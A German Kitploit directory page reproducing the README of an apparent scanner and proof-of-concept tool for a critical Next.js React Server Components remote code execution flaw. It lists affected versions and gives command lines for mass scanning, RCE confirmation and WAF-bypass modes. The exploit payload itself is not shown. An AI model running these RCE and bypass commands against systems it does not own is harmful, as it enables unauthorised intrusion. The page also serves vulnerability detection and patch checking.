Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC2-CVE-2025-55182 — Multi-Mode-Schwachstellenscanner für Next.js RCE (CVE-2025-66478/55182) mit sicherer Seitenkanalerkennung, RCE Proof-of-Concept, WAF-Bypass-Techniken und lokalem Scannen von Projektabhängigkeiten. | Kitploit
Tools/GitHubGitHub/iamblacksolo2-bugbounty/poc2-cve-2025-55182
SchwachstellenscannerPayload-GenerierungExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstests
GitHubiamblacksolo2-bugbounty/poc2-cve-2025-55182

POC2-CVE-2025-55182

Multi-Mode-Schwachstellenscanner für Next.js RCE (CVE-2025-66478/55182) mit sicherer Seitenkanalerkennung, RCE Proof-of-Concept, WAF-Bypass-Techniken und lokalem Scannen von Projektabhängigkeiten.

Repository anzeigen
13vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

React2Shell Ultimate - CVE-2025-66478 Scanner

CVE-2025-66478 CVE-2025-55182 CVSS 10.0 Python 3.7+ MIT License

Der umfassendste Scanner für die Next.js RSC Schwachstelle zur Remotecodeausführung

╔════════════════════════════════════════════════════════════════════════╗
║     ____                 _   ___  ____  _          _ _                 ║
║    |  _ \ ___  __ _  ___| |_|__ \/ ___|| |__   ___| | |                ║
║    | |_) / _ \/ _` |/ __| __| / /\___ \| '_ \ / _ \ | |                ║
║    |  _ <  __/ (_| | (__| |_ / /_ ___) | | | |  __/ | |                ║
║    |_| \_\___|\__,_|\___|\__|____|____/|_| |_|\___|_|_|                ║
║                                                                        ║
║            React2Shell Ultimate CVE-2025-66478 Scanner v1.0.0         ║
║          Next.js RSC Remote Code Execution Vulnerability               ║
╠════════════════════════════════════════════════════════════════════════╣
║                                                                        ║
║                                                                        ║
╠════════════════════════════════════════════════════════════════════════╣
║  Modes: --safe (side-channel) | --rce (PoC) | --version | --local      ║
║  WAF Bypass: --waf-bypass | --vercel-bypass | --unicode                ║
╚════════════════════════════════════════════════════════════════════════╝

🚨 Überblick über die Schwachstelle

CVE-2025-66478 (auch bekannt als CVE-2025-55182) ist eine KRITISCHE (CVSS 10.0) Schwachstelle zur Remotecodeausführung, die Next.js-Anwendungen betrifft, die React Server Components (RSC) verwenden.

Betroffene Versionen

VersionsbereichStatus
Next.js 15.0.0 - 15.0.4⚠️ Verwundbar
Next.js 15.1.0 - 15.1.8⚠️ Verwundbar
Next.js 15.2.0 - 15.2.5⚠️ Verwundbar
Next.js 15.3.0 - 15.3.5⚠️ Verwundbar
Next.js 15.4.0 - 15.4.7⚠️ Verwundbar
Next.js 15.5.0 - 15.5.6⚠️ Verwundbar
Next.js 16.0.0 - 16.0.6⚠️ Verwundbar
Next.js 14.3.0-canary.77+⚠️ Verwundbar
Next.js 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7+✅ Gepatcht
Next.js 16.0.7+✅ Gepatcht
Next.js 13.x, 14.x stable✅ Nicht betroffen

✨ Funktionen

Dieses Tool kombiniert die besten Funktionen mehrerer CVE-2025-66478-Scanner:

FeatureBeschreibung
🔍 Multi-Modus-ErkennungSicherer Seitenkanal, RCE PoC, nur Version, lokales Scannen
🛡️ WAF-Bypass-TechnikenJunk-Data-Padding, Unicode-Kodierung, Vercel-spezifischer Bypass
📁 Lokales Projekt-ScannenDurchsucht package.json, Lockfiles nach verwundbaren Abhängigkeiten
⚡ Hohe LeistungMultithread-Scannen mit konfigurierbarer Parallelität
📊 Mehrere AusgabeformateKonsole, JSON, Dateiexport
🎯 Präzise VersionserkennungHTTP-Header, RSC-Fingerprinting, Kenntnis gepatchter Versionen

🚀 Installation

# Repository klonen
git clone https://github.com/hackersatyamrastogi/react2shell-ultimate.git
cd react2shell-ultimate

# Abhängigkeiten installieren
pip install -r requirements.txt

# Oder manuell installieren
pip install requests tqdm

📖 Verwendung

Grundlegendes Scannen

# Nur Versionserkennung (am schnellsten, keine Ausnutzung)
python3 react2shell-ultimate.py -u https://target.com --version

# Sichere Seitenkanalerkennung (keine Codeausführung)
python3 react2shell-ultimate.py -u https://target.com --safe

# RCE Proof-of-Concept (führt harmlose Berechnung aus: 41*271=11111)
python3 react2shell-ultimate.py -u https://target.com --rce

# Umfassender Scan mit allen Bypass-Versuchen
python3 react2shell-ultimate.py -u https://target.com --comprehensive

Massen-Scannen

# Mehrere Ziele aus Datei scannen
python3 react2shell-ultimate.py -l targets.txt -t 20 -o results.json

# Ruhiger Modus – nur verwundbare Hosts anzeigen
python3 react2shell-ultimate.py -l targets.txt -q

# JSON-Ausgabe auf stdout
python3 react2shell-ultimate.py -l targets.txt --json

Lokales Projekt-Scannen

# Aktuelles Verzeichnis scannen
python3 react2shell-ultimate.py --local .

# Spezifischen Projektpfad scannen
python3 react2shell-ultimate.py --local /path/to/nextjs/projects

WAF-Bypass-Techniken

# Junk-Data-Bypass (fügt 128 KB Padding hinzu, um Inhaltsprüfung zu umgehen)
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass

# Benutzerdefinierte Junk-Data-Größe
python3 react2shell-ultimate.py -u https://target.com --rce --waf-bypass --waf-bypass-size 256

# Unicode-Kodierungs-Bypass
python3 react2shell-ultimate.py -u https://target.com --rce --unicode

# Vercel-spezifischer WAF-Bypass
python3 react2shell-ultimate.py -u https://target.com --rce --vercel-bypass

# Windows-Ziel (PowerShell-Payload)
python3 react2shell-ultimate.py -u https://target.com --rce --windows

Erweiterte Optionen

# Mit Proxy
python3 react2shell-ultimate.py -u https://target.com --rce --proxy http://127.0.0.1:8080

# Benutzerdefinierte Header
python3 react2shell-ultimate.py -u https://target.com --rce -H "Authorization: Bearer token"

# Erhöhter Timeout
python3 react2shell-ultimate.py -u https://target.com --rce --timeout 30

# Ausführliche Ausgabe
python3 react2shell-ultimate.py -u https://target.com --comprehensive -v

📋 Kommandozeilenoptionen

OptionBeschreibung
-u, --urlEinzelne URL zum Scannen
-l, --listDatei mit URLs (eine pro Zeile)
--localLokales Projektverzeichnis scannen
--safeSichere Seitenkanalerkennung (kein RCE)
--rceRCE Proof-of-Concept-Modus
--versionNur Versionserkennung
--comprehensiveVollständiger Scan mit allen Techniken
--waf-bypassJunk-Data für WAF-Bypass hinzufügen
--waf-bypass-sizeJunk-Data-Größe in KB (Standard: 128)
--unicodeUnicode-Kodierung für WAF-Bypass
--vercel-bypassVercel-spezifischer WAF-Bypass
--windowsWindows PowerShell-Payload verwenden
-t, --threadsGleichzeitige Threads (Standard: 10)
--timeoutRequest-Timeout in Sekunden (Standard: 10)
-k, --insecureSSL-Verifizierung deaktivieren
--proxyProxy-URL (http://host:port)
-H, --headerBenutzerdefinierter Header (wiederholbar)
-o, --outputAusgabedatei (JSON)
--all-resultsAlle Ergebnisse speichern, nicht nur verwundbare
-v, --verboseAusführliche Ausgabe
-q, --quietNur verwundbare Hosts anzeigen
--jsonJSON-Ausgabe auf stdout
--no-colorFarbige Ausgabe deaktivieren

🔬 Erkennungsmethoden

1. Sichere Seitenkanalerkennung (--safe)

Löst ein bestimmtes Fehlerantwortmuster aus, ohne Code auszuführen. Identifiziert verwundbare RSC-Implementierungen durch das Verhalten der Fehlerbehandlung.

2. RCE Proof-of-Concept (--rce)

Führt eine harmlose mathematische Berechnung aus (echo $((41*271)) = 11111), um die RCE-Fähigkeit zu bestätigen. Das Ergebnis erscheint im X-Action-Redirect-Header.

3. Versionserkennung (--version)

  • Prüft den X-Powered-By-Header auf Next.js-Version
  • Analysiert den Vary-Header auf RSC-Indikatoren
  • Testet RSC-Endpunkte auf text/x-component-Antworten
  • Durchsucht den Seitenquelltext nach Next.js-Fingerabdrücken
Tool herunterladen